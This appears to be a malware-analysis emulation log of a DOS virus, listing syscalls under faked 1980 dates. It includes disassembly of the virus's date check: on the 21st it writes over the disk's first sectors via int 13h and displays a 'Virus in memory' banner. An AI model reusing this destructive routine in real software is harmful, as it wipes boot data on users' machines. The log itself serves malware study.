{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8942,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:22:12.706380021Z | 98 | PC: 12c90 | Get current PSP |
| 2018-12-25T12:22:12.716919108Z | 42 | PC: 9f5a5 | Get date 0x9f5a5: cmp dl, 0x15 0x9f5a8: jne 0x9f5bb 0x9f5aa: mov ax, 0x309 0x9f5ad: mov dx, 0 0x9f5b0: mov cx, 1 0x9f5b3: lea bx, word ptr [0x100] 0x9f5b7: int 0x13 0x9f5b9: jmp 0x9f5cc 0x9f5bb: mov ax, 0 0x9f5be: mov ds, ax 0x9f5c0: inc word ptr [0x310] 0x9f5c4: cmp word ptr [0x310], 0xfff 0x9f5ca: jne 0x9f5dd 0x9f5cc: push cs 0x9f5cd: pop ds 0x9f5ce: mov ah, 9 0x9f5d0: mov di, 0x1e1 0x9f5d3: add di, 0x107 0x9f5d7: mov dx, di 0x9f5d9: int 0x21 |
{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8942,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:22:13.066310804Z | 98 | PC: 12c90 | Get current PSP |
| 2018-12-25T12:22:13.076194275Z | 42 | PC: 9f5a5 | Get date 0x9f5a5: cmp dl, 0x15 0x9f5a8: jne 0x9f5bb 0x9f5aa: mov ax, 0x309 0x9f5ad: mov dx, 0 0x9f5b0: mov cx, 1 0x9f5b3: lea bx, word ptr [0x100] 0x9f5b7: int 0x13 0x9f5b9: jmp 0x9f5cc 0x9f5bb: mov ax, 0 0x9f5be: mov ds, ax 0x9f5c0: inc word ptr [0x310] 0x9f5c4: cmp word ptr [0x310], 0xfff 0x9f5ca: jne 0x9f5dd 0x9f5cc: push cs 0x9f5cd: pop ds 0x9f5ce: mov ah, 9 0x9f5d0: mov di, 0x1e1 0x9f5d3: add di, 0x107 0x9f5d7: mov dx, di 0x9f5d9: int 0x21 |
| 2018-12-25T12:22:13.087790458Z | 9 | PC: 9f5db | Display string (String= 'Virus in memory !!! Created by 21.I.1990 - PMG\OTME - Tolbuhin ...') |